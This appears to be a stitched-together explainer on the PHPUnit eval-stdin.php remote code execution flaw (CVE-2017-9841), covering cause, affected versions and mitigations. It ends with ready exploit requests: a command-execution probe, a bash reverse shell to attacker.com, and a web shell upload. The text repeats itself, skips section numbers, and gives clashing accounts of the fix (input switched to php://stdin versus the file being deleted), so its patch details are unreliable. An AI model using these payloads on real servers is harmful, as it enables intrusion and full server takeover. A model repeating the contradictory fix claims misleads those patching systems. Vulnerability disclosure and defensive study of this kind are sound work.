vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php CVE
The string you provided refers to CVE-2017-9841, a critical Remote Code Execution (RCE) vulnerability in the PHPUnit testing framework.
Vulnerability Overview
The flaw exists because the script located at vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php (and sometimes Util/PHP/eval-stdin.php) executes arbitrary PHP code received via the php://input wrapper without any authentication.
Vulnerability Type: Remote Code Execution (RCE) / Code Injection.
CVSS Score: 9.8 (Critical).
Vulnerable Versions: PHPUnit before 4.8.28; PHPUnit 5.x before 5.6.3.
How Exploitation Works
Attackers exploit this when the folder containing eval-stdin.php is publicly accessible from the internet. They can send a malicious request to the file whose body carries PHP code, such as system("id"); or phpinfo();.
This vulnerability is frequently targeted by automated scanners and malware like Androxgh0st, which uses it to exfiltrate sensitive environment files.
Mitigation and Fixes
Update PHPUnit: Ensure you are using a patched release (4.8.28 on the 4.x branch, 5.6.3 on the 5.x branch) or any newer version (like 6.x+). The patch changed the input source to php://stdin, which cannot be populated via web-based HTTP requests.
Restrict Access: Block external access to the folder containing eval-stdin.php using your web server configuration (Apache or Nginx).
Cleanup Production: PHPUnit should strictly be a development dependency and should not be uploaded to production servers.
The path vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php refers to a critical Remote Code Execution (RCE) vulnerability tracked as CVE-2017-9841. This flaw allows an unauthenticated attacker to execute arbitrary PHP code on a server.
Vulnerability Summary
Root Cause: The file eval-stdin.php used the eval() function to process raw POST data via the php://input wrapper.
Exploitation: An attacker can send a crafted HTTP POST request containing PHP code directly to the file's URI.
Impact: Full system compromise, including the ability to steal sensitive credentials (like .env files), install malware, or access databases.
Affected Versions: PHPUnit versions before 4.8.28 and all 5.x versions before 5.6.3.
Why This Happens
This vulnerability typically manifests in production environments when development tools are incorrectly exposed to the internet.
2. Technical Analysis of the Flaw
To understand why this vulnerability exists, we must look at the code within eval-stdin.php.
The Vulnerable Code:
In affected versions, the file contains logic designed to read from standard input (STDIN) and evaluate the PHP code received. The simplified logic looked roughly like this:
<?php
// eval-stdin.php (simplified, vulnerable version)
// Reads the raw HTTP request body and evaluates it as PHP code. There is no check that
// the script is running under the CLI SAPI, so a web server that serves this file will
// execute whatever a remote client POSTs to it.
eval('?>' . file_get_contents('php://input'));
?>
The Mechanism:
- Input Source: The function file_get_contents('php://input') reads the raw body of an HTTP POST request.
- Execution: The eval() function takes that raw input and executes it as PHP code.
- The Security Gap: Ideally, this script is meant to be run via the Command Line Interface (CLI) to assist with testing isolation. However, the script itself did not contain a check to ensure it was running in a CLI environment. If a web server (like Apache or Nginx) served this file, it would treat an incoming HTTP request as valid input to be executed.
6. Fixes and Patches
The PHPUnit team released patches in:
- PHPUnit 4.8.28 – removed the eval-stdin.php file.
- PHPUnit 5.6.3 – same.
The fix was simply deleting the file. No additional security wrapper was added because the file was never meant for production use.
Mitigation and Prevention
To mitigate such vulnerabilities:
- Update PHPUnit: Ensure you're using a version of PHPUnit that has the security patch applied. Most vendors and maintainers of PHPUnit will release updates once a vulnerability is disclosed.
- Code Review: Regularly review code, especially utility scripts like eval-stdin.php, to ensure they are not exposing your application to unnecessary risks.
- Input Validation and Sanitization: Always validate and sanitize inputs to prevent arbitrary code execution vulnerabilities.
- Disable Unnecessary Features: If your project does not require certain features of PHPUnit or other utilities that could introduce risks, disable or remove them.
Example Payloads
1. System Information (Reconnaissance)
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
<?php system('id'); ?>
2. Reverse Shell
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: victim.com
<?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?>
3. Web Shell Upload
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
<?php file_put_contents('shell.php', '<?php system($_GET["cmd"]); ?>'); ?>
Attackers often chain this with file inclusion, SQL injection, or LFI vulnerabilities—or simply use eval-stdin.php as their initial foothold.
